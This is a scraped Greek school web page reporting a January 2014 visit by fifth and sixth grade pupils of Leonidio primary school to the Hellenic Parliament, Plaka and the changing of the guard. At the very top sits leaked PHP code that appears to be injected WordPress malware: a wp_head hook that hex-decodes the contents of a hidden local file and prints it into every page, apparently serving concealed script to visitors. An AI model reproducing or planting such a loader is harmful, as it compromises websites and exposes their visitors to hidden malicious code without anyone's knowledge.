if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ΕΠΙΣΚΕΨΗ ΣΤΗ ΒΟΥΛΗ ΤΩΝ ΕΛΛΗΝΩΝ |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

ΕΠΙΣΚΕΨΗ ΣΤΗ ΒΟΥΛΗ ΤΩΝ ΕΛΛΗΝΩΝ

ΕΠΙΣΚΕΨΗ Ε΄ ΚΑΙ  ΣΤ΄ ΤΑΞΗΣ  ΣΤΗ ΒΟΥΛΗ

Την Τρίτη 14 Ιανουαρίου 2014 , οι μαθητές της  Ε΄ και  ΣΤ΄ τάξης  του  Δημοτικού  Σχολείου  Λεωνιδίου , επισκέφθηκαν τη Βουλή των Ελλήνων. Τα παιδιά με τη συνοδεία των 4 δασκάλων τους , έκαναν πρώτα μια όμορφη βόλτα στο Μοναστηράκι,  στα γραφικά σοκάκια της Πλάκας και κατόπιν οδηγήθηκαν στο Σύνταγμα για να επισκεφτούν το κτίριο της Βουλής.

Έμαθαν για την ιστορία του κτιρίου, ξεναγήθηκαν στο Μουσείο, ψήφισαν κατά τον αρχαίο τρόπο και φυσικά οδηγήθηκαν στην αίθουσα της Ολομέλειας. Εκεί , η υπεύθυνη της Βουλής, εκτός από την ξενάγηση στο χώρο , απάντησε και σε πολλές ερωτήσεις των μαθητών.

Οι μαθητές στο τελείωμα της επίσκεψης , παρακολούθησαν στο μνημείο του Άγνωστου Στρατιώτη, την αλλαγή της φρουράς των Ευζώνων με ιδιαίτερη προσήλωση. Η εκδρομή έκλεισε με μια μεγάλη βόλτα στον Εθνικό Κήπο.